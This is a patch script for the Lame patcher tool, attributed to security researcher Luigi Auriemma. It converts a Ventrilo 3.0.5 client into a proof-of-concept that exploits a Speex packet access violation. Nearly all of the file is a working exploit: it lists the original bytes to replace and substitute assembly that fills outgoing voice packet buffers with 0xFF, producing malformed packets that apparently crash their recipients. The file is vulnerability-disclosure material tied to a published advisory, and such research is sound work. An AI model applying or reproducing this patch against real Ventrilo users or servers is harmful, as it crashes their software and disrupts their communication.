====================================================================================
#
# this file has been created for the Lame patcher program available for both *nix
# and Windows platforms.
# You need this program for continuing the patching of your files:
#
#   http://aluigi.org/mytoolz.htm#lpatch
#
# Quick step-by-step for Windows:
# - launch lpatch.exe
# - select this ventspeex.lpatch file
# - read the message windows and click yes
# - select the file (usually executables or dlls) to patch
# - read the message windows to know if everything has been patched correctly
# - test your game

TITLE
    Ventrilo <= 3.0.5 Speex packet access violation 0.1
    by Luigi Auriemma
    e-mail: aluigi@autistici.org
    web:    aluigi.org

INTRO
    This patch converts a normal Ventrilo client 3.0.5 in a proof-of-concept
    for testing the vulnerability described here:
    .
    . http://aluigi.org/adv/ventspeex-adv.txt

FILE
    ventrilo.exe

BYTES_ORIGINAL
    8B 4E 04            ; MOV ECX,DWORD PTR DS:[ESI+4]
    8B 16               ; MOV EDX,DWORD PTR DS:[ESI]
    51                  ; PUSH ECX
    52                  ; PUSH EDX
    50                  ; PUSH EAX
    E8 ?? ?? ?? ??      ; CALL Ventrilo.004EB020
    83 C4 0C            ; ADD ESP,0C

BYTES_PATCH
    ?? ?? ??            ; MOV ECX,DWORD PTR DS:[ESI+4]
    57                  ; PUSH EDI
    8B F8               ; MOV EDI,EAX
    B0 FF               ; MOV AL,0FF
    F3 AA               ; REP STOS BYTE PTR ES:[EDI]
    5F                  ; POP EDI
    90 90 90 90 90      ; NOP

====================================================================================